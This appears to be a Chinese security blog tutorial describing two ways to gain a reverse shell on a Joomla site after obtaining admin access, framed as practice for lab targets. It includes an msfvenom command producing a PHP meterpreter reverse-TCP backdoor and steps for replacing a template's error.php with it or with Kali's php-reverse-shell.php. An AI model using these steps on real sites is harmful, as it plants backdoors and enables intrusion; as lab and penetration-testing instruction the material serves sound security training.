文章前言
本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式
GetShell
Metasploit
首先我们使用site_admin/123456登录Joomla后台
在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限,这里我们随意选择一个主题
选择查看模板文件的详细信息
选择error.php文件
然后使用msfvenom来生成要给php后门文件
#PHP后门文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
然后使用我们之前在msfvenom中生成的webshell文件内容替换上面error.php文件内容
保存后访问Beez3主题下的error.php文件便可成功的突破边界
http://192.168.204.137/joomla/templates/beez3/error.php
随后在我们的MSF中获取到一个会话
GetShell-2
这里我们介绍另外一种GetShell的方法,此方法和上面的方法类似,只是用的脚本不同,我们主要通过利用Kali自带的php-reverse-shell.php来实现反弹shell的目的,文件路径为/usr/share/webshells/php/php-reverse-shell.php
随后我们直接修改模板文件的内容为上面的php-reverse-shell.php,同时修改文件中的反弹shell的地址和端口信息
随后开启监听
在WEB端访问上述的error.php文件
随后反弹shell回来
文末小结
此文仅作为Joomla后台GetShell的利用思路介绍,日常打靶机的时候Joomla遇到的可能多一些,正常的红队评估测试中外网少之又少,很少见到~
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34270.html